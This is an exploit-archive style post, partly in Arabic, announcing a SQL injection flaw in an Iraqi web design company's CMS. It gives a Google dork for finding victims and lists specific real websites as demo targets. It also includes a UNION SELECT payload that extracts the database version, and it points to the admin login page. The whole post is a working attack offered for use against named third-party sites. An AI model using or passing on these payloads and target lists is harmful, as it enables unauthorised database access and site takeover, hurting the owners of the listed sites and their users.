facebook facebook twitter rss

"برمجة وتصميم الشركة البغدادية" sql injection Vulnerability

Author: Evil Hacker , Published: 03-01-2013
 Exploit Title: ["برمجة وتصميم الشركة البغدادية"  sql injection Vulnerability ]
# Google Dork: inurl:"ifm.php?recordID="
# Date: [02\01\2013]
# Exploit Author: [Evil Hacker]
# Email: Q8@Bsdmail.Org
# Version: [All]


=================================

sql injection

example: www.xx.com/ifm.php?recordID=1(sql injection)

ربما لايظهر امامك خطا عندما تضع الشرطه .. وتظهر صفحه بيضاء .. ولاكن هو بالفعل مصاب جرب الحقن اليدوي وراح تبين الصورة ..

التطبيق اما يدوي او باي برنامج حقن

Demo:

http://alnabaandt.com/ifm.php?recordID=27'

http://alnabaandt.com/ifm.php?recordID=-27+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14--

http://www.marjaiaa.com/ifm.php?recordID=1258'

http://www.dofarts.net/ifm.php?recordID=829'

control admin

www.xxx.com/admin/login.php

good luck Iraq :P

Greats: Dr.SHA6H : Mr_alSa3ek : DamaneDz : Q8y Spy : www.r1x0.com : www.exploit4arab.com

Like us on Facebook :